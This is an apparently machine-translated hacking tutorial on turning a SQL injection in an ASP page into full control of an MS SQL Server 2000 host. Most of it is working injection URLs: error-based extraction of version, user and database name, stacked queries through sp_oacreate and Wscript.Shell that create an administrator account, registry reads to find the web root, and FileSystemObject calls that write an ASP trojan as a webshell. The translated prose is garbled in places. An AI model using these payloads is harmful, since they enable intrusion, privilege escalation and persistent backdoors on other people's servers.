Squeeze dry MS SQL Server last drop of blood

Server changes the network, network security so that people cannot but pay attention to it. Database, so we have to think of the powerful Oracle,ms SQL. Microsoft has the most vulnerabilities, using SQL injection today to make MS SQL work well for us.

The following (using a well-known site as a test point), I believe that everyone on the SQL explosion database, explosion table, explosion fields have mastered, here is not much to say this.

Introduction to MS SQL built-in functions:

@ @VERSION Get the version number of Windows, MS SQL version number, patch. USER_NAME () Gets the current system connection user db_name () to get the current connected database HOST_NAME () to get the name of the current host

This information helps us to have a simple understanding of the system

OK, let's start right now!

Statement:

Http://www.xxx.com/list.asp?classid=1 '

Return information:

Microsoft OLE DB Provider for SQL Server error ' 80040e14 ' string ' ORDER by Id DESC ' before closing quotes. /list.asp, Line 290

From here the closed quotation marks ("'"), we can determine the existence of the SQL injection. Found in the loophole of course went on, using the functions described above for us to work:

Statement:

Http://www.xxx.com/list.asp?classid=1 and 0<> (SELECT @ @version)

Return:

Microsoft OLE DB Provider for SQL server error ' 80040e07 ' will nvarchar value ' Microsoft SQL Server 2000-8.00.760 (Intel X86) Dec 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (build 2195:service Pac K 4 "A syntax error occurred while converting to a column with a data type of int. /list.asp, Line 290

The relevant information comes out, MS Server ADVANCED server 2000+SP4, SQL 2000+sp3, 8.00.760 from behind the MS SQL Server can be seen as a SP3 patch. Look at the server information, then you should understand the permissions of the database:

Statement:

Http://www.xxx.com/list.asp?classid=1 and user_name () = ' dbo '

Back: Information returned normally

Determines whether the permission is dbo, and connection users from surface dbo permissions are often involved in members of the sysadmin server role. Indicates that the database server role member group defaults to adding one dbo user per database.

Return principle root 1=1,1=2 similar. This is just a privilege test, and we also blew it out to see:

Statement:

Http://www.xxx.com/list.asp?classid=1 and 0<> (select USER_NAME ())

Return:

A syntax error occurred when Microsoft OLE DB Provider for SQL Server error ' 80040e07 ' converts the nvarchar value ' dbo ' to a column with a data type of int. /list.asp, Line 290

Indicates that the user permissions for the connection database are high and can be determined to be members of the server role group.

Statement: Http://www.xxx.com/list.asp?classid=1 and 0<> (select Db_name ())-back: Microsoft OLE db Provider for SQL Server error ' 80040e07 ' syntax error occurred converting nvarchar value ' Gameimgsys ' to a column with a data type of int. /list.asp, Line 290

This can burst the current database. Access to such a high degree of access to the database connection members, of course, we would like to get Webshell directly, or directly to the NT ADMIN. NT admin depends on the current server configuration, if the configuration of unreasonable server, we want to directly take NT Admin, take NT admin will use:

MSSQL Built-in stored procedures:

sp_OACreate (through it, the damage is much greater, but sysadmins permissions are required to be used) sp_OAGetErrorInfo sp_OAGetProperty sp_OAMethod sp_OASetProperty Setpropertysp_oastop

Because MS SQL can execute multiple statements at once, we have the opportunity to use more statements.

Statement:

http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT exec sp_oacreate ' Wscript.Shell ', @shell OUTPUT exec sp_oamethod @shell, ' run ', NULL, ' C:\WINNT\system32 \cmd.exe/c net user cntest Chinatest/add '

Normal return. (Hint: If the shell exists on the host, it will create a cntest user on the server)

Create the user, and add a net localgroup Administrators cntest/add to the administrative group after the statement. If the other side of the machine is open 3389 ports, or IPC, then the next thing, I do not have to say more.

Encounter professional host, only open a 80-port, that should do? Of course, we may still get webshell, and then slowly penetrate.

Because of the high privilege, we may first build the table, write ASP Trojan data and then through the Makewebtask, Get websehll. The manual written program is too complex to lock, upload Webshell The biggest problem is the web directory, now online already have off-the-shelf tools through backup, and maskwebtask tools to get Webshell. Here's a recommendation to get the Web page path (read the registry through a stored procedure):

Xp_regread with built-in stored procedures (read registry key values, permissions public):

Statement:

http://www.xxx.com/list.asp?classid=1; CREATE TABLE newtable (id int IDENTITY (1,1), paths varchar) Declare @test varchar () exec master. Xp_regread @rootkey = ' hkey_local_machine ', @key = ' system\currentcontrolset\services\w3svc\parameters\virtual Roots\ ', @value_name = '/', values= @test OUTPUT INSERT INTO paths (path) values (@test)

The default path for IIS is Hkey_local_machine\ system\currentcontrolset\services\w3svc\parameters\virtual in the registry Roots\

Use the Burst field to read the value of the database:

Statement:

Http://www.xxx.com/list.asp?classid=1 and 0<> (select top 1 paths from newtable)

Return:

Microsoft OLE DB Provider for ODBC Drivers error ' 80040e07 ' [MICROSOFT][ODBC SQL Server DRIVER][SQL Server] varchar value ' E:\WW w,,201 ' syntax error converting to a column with a data type of int.

This description of the Web page directory in E:\www, the next can also use the FSO directly to the ASP Trojan Horse (hint must have the sysadmin permission to use the FSO and FSO open under the premise):

Statement:

Http://www.xxx.com/list.asp?class=1;
declare%20@o%20int,%20@f%20int,%20@t%20int,%20@ret%20int%20exec%20sp_oacreate%20 ' scripting. FileSystemObject ',
%20@o%20out%20exec%20sp_oamethod%20@o,%20 ' CreateTextFile ',%20@f%20out,%20 ' e: \www\test.asp ',
1%20exec%20@ret%20=%20sp_oamethod%20@f,%20 ' WriteLine ',%20null,%20 ' on Error Resume Next '

Create a test.asp under E:\WWW and write to the on Error Resume Next statement:

http://www.xxx.com/list.asp?classid=1;
declare%20@o%20int,%20@f%20int,%20@t%20int,%20@ret%20int%20exec%20sp_oacreate%20 ' scripting. FileSystemObject ',
%20@o%20out%20exec%20sp_oamethod%20@o,%20 ' OpenTextFile ',
%20@f%20out,%20 ' e: \www\test.asp ', 8%20exec%20@ret%20=%20sp_oamethod%20@f,%20 ' WriteLine ',%20null,% ' ASP horse '

Add a row to the E:\WWW\test.asp record for the ASP horse, the entire full Trojan may write this. (% percent sign to use%25 instead of write). What if you don't get the Web directory? If you want to guess whether the Web site uses the default Web, or use the domain name as the web.

DECLARE @o int exec sp_oacreate ' Wscript.Shell ', @o out exec sp_OAMethod @o, ' run ', NULL, ' cscript.exe c:\inetpub\wwwroot\ Mkwebdir.vbs-w "Default Web Site"-V "E", "E:\"

Under the Default Web site, create a virtual directory E, pointing to e: disk.

DECLARE @o int exec sp_oacreate ' Wscript.Shell ', @o out exec sp_OAMethod @o, ' run ', NULL, ' cscript.exe c:\inetpub\wwwroot\ Chaccess.vbs-a w3svc/1/root/e +browse '

It's nice to add browsing properties to the virtual directory E. Open a virtual service for yourself. Think of those pages directory path, the head is almost broken. This gives yourself a day to open your eyes. That biography Webshell use MS SQL for our work for a period of fall, the next work should be you.